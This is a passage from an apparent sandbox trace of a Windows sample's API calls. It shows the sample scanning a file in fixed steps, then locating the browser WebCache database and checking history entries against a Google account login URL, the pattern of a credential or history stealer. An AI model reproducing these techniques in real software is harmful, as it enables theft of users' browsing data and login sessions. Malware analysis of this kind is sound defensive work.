dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x7380 [0085.937] ReadFile (in: hFile=0xa4, lpBuffer=0x285d80, nNumberOfBytesToRead=0x8, lpNumberOfBytesRead=0x281b28, lpOverlapped=0x0 | out: lpBuffer=0x285d80*, lpNumberOfBytesRead=0x281b28*=0x8, lpOverlapped=0x0) returned 1 [0085.937] _memicmp (_Buf1=0x285d80, _Buf2=0x44a6cc, _Size=0x4) returned -1 [0085.937] SetFilePointer (in: hFile=0xa4, lDistanceToMove=29696, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x7400 [0085.937] ReadFile (in: hFile=0xa4, lpBuffer=0x285d80, nNumberOfBytesToRead=0x8, lpNumberOfBytesRead=0x281b28, lpOverlapped=0x0 | out: lpBuffer=0x285d80*, lpNumberOfBytesRead=0x281b28*=0x8, lpOverlapped=0x0) returned 1 [0085.937] _memicmp (_Buf1=0x285d80, _Buf2=0x44a6cc, _Size=0x4) returned -1 [0085.937] SetFilePointer (in: hFile=0xa4, lDistanceToMove=29824, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x7480 [0085.937] ReadFile (in: hFile=0xa4, lpBuffer=0x285d80, nNumberOfBytesToRead=0x8, lpNumberOfBytesRead=0x281b28, lpOverlapped=0x0 | out: lpBuffer=0x285d80*, lpNumberOfBytesRead=0x281b28*=0x8, lpOverlapped=0x0) returned 1 [0085.937] _memicmp (_Buf1=0x285d80, _Buf2=0x44a6cc, _Size=0x4) returned -1 [0085.937] SetFilePointer (in: hFile=0xa4, lDistanceToMove=29952, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x7500 [0085.937] ReadFile (in: hFile=0xa4, lpBuffer=0x285d80, nNumberOfBytesToRead=0x8, lpNumberOfBytesRead=0x281b28, lpOverlapped=0x0 | out: lpBuffer=0x285d80*, lpNumberOfBytesRead=0x281b28*=0x8, lpOverlapped=0x0) returned 1 [0085.937] _memicmp (_Buf1=0x285d80, _Buf2=0x44a6cc, _Size=0x4) returned -1 [0085.937] SetFilePointer (in: hFile=0xa4, lDistanceToMove=30080, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x7580 [0085.937] ReadFile (in: hFile=0xa4, lpBuffer=0x285d80, nNumberOfBytesToRead=0x8, lpNumberOfBytesRead=0x281b28, lpOverlapped=0x0 | out: lpBuffer=0x285d80*, lpNumberOfBytesRead=0x281b28*=0x8, lpOverlapped=0x0) returned 1 [0085.938] _memicmp (_Buf1=0x285d80, _Buf2=0x44a6cc, _Size=0x4) returned -1 [0085.938] SetFilePointer (in: hFile=0xa4, lDistanceToMove=30208, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x7600 [0085.938] ReadFile (in: hFile=0xa4, lpBuffer=0x285d80, nNumberOfBytesToRead=0x8, lpNumberOfBytesRead=0x281b28, lpOverlapped=0x0 | out: lpBuffer=0x285d80*, lpNumberOfBytesRead=0x281b28*=0x8, lpOverlapped=0x0) returned 1 [0085.938] _memicmp (_Buf1=0x285d80, _Buf2=0x44a6cc, _Size=0x4) returned -1 [0085.938] SetFilePointer (in: hFile=0xa4, lDistanceToMove=30336, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x7680 [0085.938] ReadFile (in: hFile=0xa4, lpBuffer=0x285d80, nNumberOfBytesToRead=0x8, lpNumberOfBytesRead=0x281b28, lpOverlapped=0x0 | out: lpBuffer=0x285d80*, lpNumberOfBytesRead=0x281b28*=0x8, lpOverlapped=0x0) returned 1 [0085.938] _memicmp (_Buf1=0x285d80, _Buf2=0x44a6cc, _Size=0x4) returned -1 [0085.938] SetFilePointer (in: hFile=0xa4, lDistanceToMove=30464, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x7700 [0085.938] ReadFile (in: hFile=0xa4, lpBuffer=0x285d80, nNumberOfBytesToRead=0x8, lpNumberOfBytesRead=0x281b28, lpOverlapped=0x0 | out: lpBuffer=0x285d80*, lpNumberOfBytesRead=0x281b28*=0x8, lpOverlapped=0x0) returned 1 [0085.938] _memicmp (_Buf1=0x285d80, _Buf2=0x44a6cc, _Size=0x4) returned -1 [0085.938] SetFilePointer (in: hFile=0xa4, lDistanceToMove=30592, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x7780 [0085.938] ReadFile (in: hFile=0xa4, lpBuffer=0x285d80, nNumberOfBytesToRead=0x8, lpNumberOfBytesRead=0x281b28, lpOverlapped=0x0 | out: lpBuffer=0x285d80*, lpNumberOfBytesRead=0x281b28*=0x8, lpOverlapped=0x0) returned 1 [0085.938] _memicmp (_Buf1=0x285d80, _Buf2=0x44a6cc, _Size=0x4) returned -1 [0085.938] SetFilePointer (in: hFile=0xa4, lDistanceToMove=30720, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x7800 [0085.938] ReadFile (in: hFile=0xa4, lpBuffer=0x285d80, nNumberOfBytesToRead=0x8, lpNumberOfBytesRead=0x281b28, lpOverlapped=0x0 | out: lpBuffer=0x285d80*, lpNumberOfBytesRead=0x281b28*=0x8, lpOverlapped=0x0) returned 1 [0085.938] _memicmp (_Buf1=0x285d80, _Buf2=0x44a6cc, _Size=0x4) returned -1 [0085.938] SetFilePointer (in: hFile=0xa4, lDistanceToMove=30848, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x7880 [0085.938] ReadFile (in: hFile=0xa4, lpBuffer=0x285d80, nNumberOfBytesToRead=0x8, lpNumberOfBytesRead=0x281b28, lpOverlapped=0x0 | out: lpBuffer=0x285d80*, lpNumberOfBytesRead=0x281b28*=0x8, lpOverlapped=0x0) returned 1 [0085.938] _memicmp (_Buf1=0x285d80, _Buf2=0x44a6cc, _Size=0x4) returned -1 [0085.938] SetFilePointer (in: hFile=0xa4, lDistanceToMove=30976, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x7900 [0085.938] ReadFile (in: hFile=0xa4, lpBuffer=0x285d80, nNumberOfBytesToRead=0x8, lpNumberOfBytesRead=0x281b28, lpOverlapped=0x0 | out: lpBuffer=0x285d80*, lpNumberOfBytesRead=0x281b28*=0x8, lpOverlapped=0x0) returned 1 [0085.938] _memicmp (_Buf1=0x285d80, _Buf2=0x44a6cc, _Size=0x4) returned -1 [0085.938] SetFilePointer (in: hFile=0xa4, lDistanceToMove=31104, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x7980 [0085.938] ReadFile (in: hFile=0xa4, lpBuffer=0x285d80, nNumberOfBytesToRead=0x8, lpNumberOfBytesRead=0x281b28, lpOverlapped=0x0 | out: lpBuffer=0x285d80*, lpNumberOfBytesRead=0x281b28*=0x8, lpOverlapped=0x0) returned 1 [0085.938] _memicmp (_Buf1=0x285d80, _Buf2=0x44a6cc, _Size=0x4) returned -1 [0085.938] SetFilePointer (in: hFile=0xa4, lDistanceToMove=31232, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x7a00 [0085.939] ReadFile (in: hFile=0xa4, lpBuffer=0x285d80, nNumberOfBytesToRead=0x8, lpNumberOfBytesRead=0x281b28, lpOverlapped=0x0 | out: lpBuffer=0x285d80*, lpNumberOfBytesRead=0x281b28*=0x8, lpOverlapped=0x0) returned 1 [0085.939] _memicmp (_Buf1=0x285d80, _Buf2=0x44a6cc, _Size=0x4) returned -1 [0085.939] SetFilePointer (in: hFile=0xa4, lDistanceToMove=31360, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x7a80 [0085.939] ReadFile (in: hFile=0xa4, lpBuffer=0x285d80, nNumberOfBytesToRead=0x8, lpNumberOfBytesRead=0x281b28, lpOverlapped=0x0 | out: lpBuffer=0x285d80*, lpNumberOfBytesRead=0x281b28*=0x8, lpOverlapped=0x0) returned 1 [0085.939] _memicmp (_Buf1=0x285d80, _Buf2=0x44a6cc, _Size=0x4) returned -1 [0085.939] SetFilePointer (in: hFile=0xa4, lDistanceToMove=31488, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x7b00 [0085.939] ReadFile (in: hFile=0xa4, lpBuffer=0x285d80, nNumberOfBytesToRead=0x8, lpNumberOfBytesRead=0x281b28, lpOverlapped=0x0 | out: lpBuffer=0x285d80*, lpNumberOfBytesRead=0x281b28*=0x8, lpOverlapped=0x0) returned 1 [0085.939] _memicmp (_Buf1=0x285d80, _Buf2=0x44a6cc, _Size=0x4) returned -1 [0085.939] SetFilePointer (in: hFile=0xa4, lDistanceToMove=31616, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x7b80 [0085.939] ReadFile (in: hFile=0xa4, lpBuffer=0x285d80, nNumberOfBytesToRead=0x8, lpNumberOfBytesRead=0x281b28, lpOverlapped=0x0 | out: lpBuffer=0x285d80*, lpNumberOfBytesRead=0x281b28*=0x8, lpOverlapped=0x0) returned 1 [0085.939] _memicmp (_Buf1=0x285d80, _Buf2=0x44a6cc, _Size=0x4) returned -1 [0085.939] SetFilePointer (in: hFile=0xa4, lDistanceToMove=31744, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x7c00 [0085.939] ReadFile (in: hFile=0xa4, lpBuffer=0x285d80, nNumberOfBytesToRead=0x8, lpNumberOfBytesRead=0x281b28, lpOverlapped=0x0 | out: lpBuffer=0x285d80*, lpNumberOfBytesRead=0x281b28*=0x8, lpOverlapped=0x0) returned 1 [0085.939] _memicmp (_Buf1=0x285d80, _Buf2=0x44a6cc, _Size=0x4) returned -1 [0085.939] SetFilePointer (in: hFile=0xa4, lDistanceToMove=31872, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x7c80 [0085.939] ReadFile (in: hFile=0xa4, lpBuffer=0x285d80, nNumberOfBytesToRead=0x8, lpNumberOfBytesRead=0x281b28, lpOverlapped=0x0 | out: lpBuffer=0x285d80*, lpNumberOfBytesRead=0x281b28*=0x8, lpOverlapped=0x0) returned 1 [0085.939] _memicmp (_Buf1=0x285d80, _Buf2=0x44a6cc, _Size=0x4) returned -1 [0085.939] SetFilePointer (in: hFile=0xa4, lDistanceToMove=32000, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x7d00 [0085.939] ReadFile (in: hFile=0xa4, lpBuffer=0x285d80, nNumberOfBytesToRead=0x8, lpNumberOfBytesRead=0x281b28, lpOverlapped=0x0 | out: lpBuffer=0x285d80*, lpNumberOfBytesRead=0x281b28*=0x8, lpOverlapped=0x0) returned 1 [0085.939] _memicmp (_Buf1=0x285d80, _Buf2=0x44a6cc, _Size=0x4) returned -1 [0085.939] SetFilePointer (in: hFile=0xa4, lDistanceToMove=32128, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x7d80 [0085.939] ReadFile (in: hFile=0xa4, lpBuffer=0x285d80, nNumberOfBytesToRead=0x8, lpNumberOfBytesRead=0x281b28, lpOverlapped=0x0 | out: lpBuffer=0x285d80*, lpNumberOfBytesRead=0x281b28*=0x8, lpOverlapped=0x0) returned 1 [0085.939] _memicmp (_Buf1=0x285d80, _Buf2=0x44a6cc, _Size=0x4) returned -1 [0085.939] SetFilePointer (in: hFile=0xa4, lDistanceToMove=32256, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x7e00 [0085.939] ReadFile (in: hFile=0xa4, lpBuffer=0x285d80, nNumberOfBytesToRead=0x8, lpNumberOfBytesRead=0x281b28, lpOverlapped=0x0 | out: lpBuffer=0x285d80*, lpNumberOfBytesRead=0x281b28*=0x8, lpOverlapped=0x0) returned 1 [0085.940] _memicmp (_Buf1=0x285d80, _Buf2=0x44a6cc, _Size=0x4) returned -1 [0085.940] SetFilePointer (in: hFile=0xa4, lDistanceToMove=32384, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x7e80 [0085.940] ReadFile (in: hFile=0xa4, lpBuffer=0x285d80, nNumberOfBytesToRead=0x8, lpNumberOfBytesRead=0x281b28, lpOverlapped=0x0 | out: lpBuffer=0x285d80*, lpNumberOfBytesRead=0x281b28*=0x8, lpOverlapped=0x0) returned 1 [0085.940] _memicmp (_Buf1=0x285d80, _Buf2=0x44a6cc, _Size=0x4) returned -1 [0085.940] SetFilePointer (in: hFile=0xa4, lDistanceToMove=32512, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x7f00 [0085.940] ReadFile (in: hFile=0xa4, lpBuffer=0x285d80, nNumberOfBytesToRead=0x8, lpNumberOfBytesRead=0x281b28, lpOverlapped=0x0 | out: lpBuffer=0x285d80*, lpNumberOfBytesRead=0x281b28*=0x8, lpOverlapped=0x0) returned 1 [0085.940] _memicmp (_Buf1=0x285d80, _Buf2=0x44a6cc, _Size=0x4) returned -1 [0085.940] SetFilePointer (in: hFile=0xa4, lDistanceToMove=32640, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x7f80 [0085.940] ReadFile (in: hFile=0xa4, lpBuffer=0x285d80, nNumberOfBytesToRead=0x8, lpNumberOfBytesRead=0x281b28, lpOverlapped=0x0 | out: lpBuffer=0x285d80*, lpNumberOfBytesRead=0x281b28*=0x8, lpOverlapped=0x0) returned 1 [0085.940] _memicmp (_Buf1=0x285d80, _Buf2=0x44a6cc, _Size=0x4) returned -1 [0085.940] CloseHandle (hObject=0xa4) returned 1 [0085.940] FindNextFileW (in: hFindFile=0x591b28, lpFindFileData=0x2881b0 | out: lpFindFileData=0x2881b0) returned 0 [0085.940] FindClose (in: hFindFile=0x591b28 | out: hFindFile=0x591b28) returned 1 [0085.940] FindNextFileW (in: hFindFile=0x58e8e8, lpFindFileData=0x288bac | out: lpFindFileData=0x288bac) returned 0 [0085.940] FindClose (in: hFindFile=0x58e8e8 | out: hFindFile=0x58e8e8) returned 1 [0085.940] FindNextFileW (in: hFindFile=0x58e8a8, lpFindFileData=0x2895a8 | out: lpFindFileData=0x2895a8) returned 0 [0085.940] FindClose (in: hFindFile=0x58e8a8 | out: hFindFile=0x58e8a8) returned 1 [0085.940] FindNextFileW (in: hFindFile=0x58e868, lpFindFileData=0x289fa4 | out: lpFindFileData=0x289fa4) returned 0 [0085.940] FindClose (in: hFindFile=0x58e868 | out: hFindFile=0x58e868) returned 1 [0085.941] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x28a2e4, csidl=28, fCreate=0 | out: pszPath="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local") returned 1 [0085.942] wcslen (_String="Microsoft\\Windows\\WebCache\\WebCacheV01.dat") returned 0x2a [0085.942] wcslen (_String="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local") returned 0x26 [0085.942] wcscpy (in: _Dest=0x28a4f4, _Source="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local" | out: _Dest="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local") returned="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local" [0085.942] wcslen (_String="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local") returned 0x26 [0085.942] wcscat (in: _Dest=0x28a4f4, _Source="\\" | out: _Dest="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\") returned="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\" [0085.942] wcscat (in: _Dest=0x28a4f4, _Source="Microsoft\\Windows\\WebCache\\WebCacheV01.dat" | out: _Dest="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Microsoft\\Windows\\WebCache\\WebCacheV01.dat") returned="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Microsoft\\Windows\\WebCache\\WebCacheV01.dat" [0085.942] GetFileAttributesW (lpFileName="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Microsoft\\Windows\\WebCache\\WebCacheV01.dat" (normalized: "c:\\users\\bgc6u8oy yxgxkr\\appdata\\local\\microsoft\\windows\\webcache\\webcachev01.dat")) returned 0xffffffff [0085.942] wcslen (_String="Microsoft\\Windows\\WebCache\\WebCacheV24.dat") returned 0x2a [0085.942] wcslen (_String="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local") returned 0x26 [0085.942] wcscpy (in: _Dest=0x28a4f4, _Source="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local" | out: _Dest="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local") returned="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local" [0085.942] wcslen (_String="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local") returned 0x26 [0085.942] wcscat (in: _Dest=0x28a4f4, _Source="\\" | out: _Dest="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\") returned="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\" [0085.942] wcscat (in: _Dest=0x28a4f4, _Source="Microsoft\\Windows\\WebCache\\WebCacheV24.dat" | out: _Dest="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Microsoft\\Windows\\WebCache\\WebCacheV24.dat") returned="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Microsoft\\Windows\\WebCache\\WebCacheV24.dat" [0085.942] GetFileAttributesW (lpFileName="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Microsoft\\Windows\\WebCache\\WebCacheV24.dat" (normalized: "c:\\users\\bgc6u8oy yxgxkr\\appdata\\local\\microsoft\\windows\\webcache\\webcachev24.dat")) returned 0xffffffff [0085.942] wcscmp (_String1="https://www.google.com/accounts/servicelogin", _String2=":host: www.google.de") returned 1 [0085.942] wcscmp (_String1="https://www.google.com/accounts/servicelogin", _String2=":host: www.msn.com") returned 1 [0085.942] wcscmp (_String1="https://www.google.com/accounts/servicelogin", _String2="https://www.google.de/") returned -1 [0085.942] wcscmp (_String1="https://www.google.com/accounts/servicelogin", _String2="http://www.msn.com/de-de/") returned 1 [0085.942] wcscmp (_String1="https://www.google.com/accounts/servicelogin", _String2="https://support.microsoft.com/products/internet-explorer") returned 1 [0085.942] wcscmp (_String1="https://www.google.com/accounts/servicelogin", _String2="https://www.microsoft.com/en-us/iegallery") returned -1 [0085.942] wcscmp (_String1="https://www.google.com/accounts/servicelogin", _String2="http://www.iegallery.com/en/addons/") returned 1 [0085.942] wcscmp (_String1="https://www.google.com/accounts/servicelogin", _String2="https://support.microsoft.com/en-us/products/internet-explorer") returned 1 [0085.942] wcscmp (_String1="https://www.google.com/accounts/servicelogin", _String2="http://go.microsoft.com/fwlink/") returned 1 [0085.942] wcscmp (_String1="https://www.google.com/accounts/servicelogin", _String2="https://support.microsoft.com/internet-explorer") returned 1 [0085.942] wcscmp (_String1="https://www.google.com/accounts/servicelogin", _String2="http://www.msn.com/") returned 1 [0085.942] wcscmp (_String1="https://www.google.com/accounts/servicelogin", _String2=":host: computer") returned 1 [0085.942] wcscmp (_String1="https://www.google.com/accounts/servicelogin", _String2="file:///c:/users/bgc6u8~1/desktop/sample_file.doc") returned 1 [0085.943] wcscmp (_String1="https://www.google.com/accounts/servicelogin", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/videos/o%201bunagzfik.flv") returned 1 [0085.943] wcscmp (_String1="https://www.google.com/accounts/servicelogin", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/videos/4q6akwegf.mkv") returned 1 [0085.943] wcscmp (_String1="https://www.google.com/accounts/servicelogin", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/videos/e1-szdw/cs-nayun66m1kj0qh.flv") returned 1 [0085.943] wcscmp (_String1="https://www.google.com/accounts/servicelogin", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/documents/kdgk.docx") returned 1 [0085.943] wcscmp (_String1="https://www.google.com/accounts/servicelogin", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/appdata/roaming/txcexlftylq2o.gif") returned 1 [0085.943] wcscmp (_String1="https://www.google.com/accounts/servicelogin", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/appdata/roaming/lxcfr82x4aq4uswn.mkv") returned 1 [0085.943] wcscmp (_String1="https://www.google.com/accounts/servicelogin", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/desktop/y0vxikbyowmim.gif") returned 1 [0085.943] wcscmp (_String1="https://www.google.com/accounts/servicelogin", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/appdata/roaming/x-baj.mkv") returned 1 [0085.943] wcscmp (_String1="https://www.google.com/accounts/servicelogin", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/appdata/roaming/gm13ifqvw%20o2ca5sqcfu.gif") returned 1 [0085.943] wcscmp (_String1="https://www.google.com/accounts/servicelogin", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/videos/crxv%20j7wkoocqrc.flv") returned 1 [0085.943] wcscmp (_String1="https://www.google.com/accounts/servicelogin", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/videos/ggxj998_.flv") returned 1 [0085.943] wcscmp (_String1="https://www.google.com/accounts/servicelogin", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/appdata/roaming/pvp12cuh1.mkv") returned 1 [0085.943] wcscmp (_String1="https://www.google.com/accounts/servicelogin", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/appdata/roaming/hsii3%20s6wx.ots") returned 1 [0085.943] wcscmp (_String1="https://www.google.com/accounts/servicelogin", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/videos/e1-szdw/ivpbf2a6zwg8th8g0v.swf") returned 1 [0085.943] wcscmp (_String1="https://www.google.com/accounts/servicelogin", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/videos/e1-szdw/ym9tcvsa3hy3_sch.swf") returned 1 [0085.943] wcscmp (_String1="https://www.google.com/accounts/servicelogin", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/appdata/roaming/ncgtsu2wgq6.bmp") returned 1 [0085.943] wcscmp (_String1="https://www.google.com/accounts/servicelogin", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/documents/lo28gaemu_vvrwsd70/i4z-zbsf9hntkbakip/yzvsri7wb0.pdf") returned 1 [0085.943] wcscmp (_String1="https://www.google.com/accounts/servicelogin", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/desktop/vwkcvzfj9feo9nnp/nnkxqyu2c.bmp") returned 1 [0085.943] wcscmp (_String1="https://www.google.com/accounts/servicelogin", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/pictures/mo6xttvz/z2lyobass%20shwl/cvm_.jpg") returned 1 [0085.943] wcscmp (_String1="https://www.google.com/accounts/servicelogin", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/pictures/mo6xttvz/z2lyobass%20shwl/tpxyvhqitsjwonkmm/ywz6bckdgkeadv/msez/uwefm1na-dsdirw%20v7.bmp") returned 1 [0085.943] wcscmp (_String1="https://www.google.com/accounts/servicelogin", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/documents/lo28gaemu_vvrwsd70/i4z-zbsf9hntkbakip/saeibjk2.odp") returned 1 [0085.943] wcscmp (_String1="https://www.google.com/accounts/servicelogin", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/documents/pjm8g%20hd0vdm.docx") returned 1 [0085.943] wcscmp (_String1="https://www.google.com/accounts/servicelogin", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/pictures/mo6xttvz/z2lyobass%20shwl/tpxyvhqitsjwonkmm/ywz6bckdgkeadv/jbjbayjalmaqe.jpg") returned 1 [0085.943] wcscmp (_String1="https://www.google.com/accounts/servicelogin", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/documents/lo28gaemu_vvrwsd70/p0mmc6mktcpt8jz.ots") returned 1 [0085.943] wcscmp (_String1="https://www.google.com/accounts/servicelogin", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/desktop/vwkcvzfj9feo9nnp/xqiysgiqzh.swf") returned 1 [0085.943] wcscmp (_String1="https://www.google.com/accounts/servicelogin", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/pictures/mo6xttvz/z2lyobass%20shwl/xcrdcv/shcj2ukhha9e2.png") returned 1 [0085.943] wcscmp (_String1="https://www.google.com/accounts/servicelogin", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/pictures/mo6xttvz/z2lyobass%20shwl/tpxyvhqitsjwonkmm/ywz6bckdgkeadv/hdfqw%20qk5silpa%20io/0ivkoykeh0-af8.png") returned 1 [0085.943] wcscmp (_String1="https://www.google.com/accounts/servicelogin", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/appdata/roaming/zwfvn9iebk6wzpag.mkv") returned 1 [0085.943] wcscmp (_String1="https://www.google.com/accounts/servicelogin", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/desktop/vwkcvzfj9feo9nnp/v0ufl0ag.flv") returned 1 [0085.943] wcscmp (_String1="https://www.google.com/accounts/servicelogin", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/documents/lo28gaemu_vvrwsd70/a3ne_yxum0cld.csv") returned 1 [0085.943] wcscmp (_String1="https://www.google.com/accounts/servicelogin", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/documents/6fshffojtwspry33.ppt") returned 1 [0085.943] wcscmp (_String1="https://www.google.com/accounts/servicelogin", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/documents/lo28gaemu_vvrwsd70/hby7gwij.doc") returned 1 [0085.943] wcscmp (_String1="https://www.google.com/accounts/servicelogin", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/desktop/vwkcvzfj9feo9nnp/uhtkq-tczvm9tdvxvw.flv") returned 1 [0085.943] wcscmp (_String1="https://www.google.com/accounts/servicelogin", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/pictures/mo6xttvz/z2lyobass%20shwl/tpxyvhqitsjwonkmm/ywz6bckdgkeadv/msez/28laxbsq3m50.jpg") returned 1 [0085.944] wcscmp (_String1="https://www.google.com/accounts/servicelogin", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/pictures/mo6xttvz/xcj9p.jpg") returned 1 [0085.944] wcscmp (_String1="https://www.google.com/accounts/servicelogin", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/documents/lo28gaemu_vvrwsd70/gxv2c5bzmuai647pclru.xlsx") returned 1 [0085.944] wcscmp (_String1="https://www.google.com/accounts/servicelogin", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/desktop/vwkcvzfj9feo9nnp/w5qvdpae9jrz.pdf") returned 1 [0085.944] wcscmp (_String1="https://www.google.com/accounts/servicelogin", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/documents/lo28gaemu_vvrwsd70/kvgo2ps.odt") returned 1 [0085.944] wcscmp (_String1="https://www.google.com/accounts/servicelogin", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/videos/lu_nzwrgi2ssxtfhhhg.swf") returned 1 [0085.944] wcscmp (_String1="https://www.google.com/accounts/servicelogin", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/desktop/vwkcvzfj9feo9nnp/c9v5cwhsfounz.png") returned 1 [0085.944] wcscmp (_String1="https://www.google.com/accounts/servicelogin", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/appdata/roaming/g5ve1ybcahauz0t.gif") returned 1 [0085.944] wcscmp (_String1="https://www.google.com/accounts/servicelogin", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/documents/3sc0z1bfbrlsq.ppt") returned 1 [0085.944] wcscmp (_String1="https://www.google.com/accounts/servicelogin", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/pictures/mo6xttvz/z2lyobass%20shwl/tpxyvhqitsjwonkmm/ywz6bckdgkeadv/ohxnykh_ufz4.gif") returned 1 [0085.944] wcscmp (_String1="https://www.google.com/accounts/servicelogin", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/documents/2n_gtpylh.odt") returned 1 [0085.944] wcscmp (_String1="https://www.google.com/accounts/servicelogin", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/videos/dc0kkkmref9xs.swf") returned 1 [0085.944] wcscmp (_String1="https://www.google.com/accounts/servicelogin", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/videos/bbuhdsebor_wx0_ly.flv") returned 1 [0085.944] wcscmp (_String1="https://www.google.com/accounts/servicelogin", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/documents/neiwqsqwjb.docx") returned 1 [0085.944] wcscmp (_String1="https://www.google.com/accounts/servicelogin", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/appdata/roaming/i-vzxxaq.ppt") returned 1 [0085.944] wcscmp (_String1="https://www.google.com/accounts/servicelogin", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/videos/s%201xjks5rgwiostrv.flv") returned 1 [0085.944] wcscmp (_String1="https://www.google.com/accounts/servicelogin", 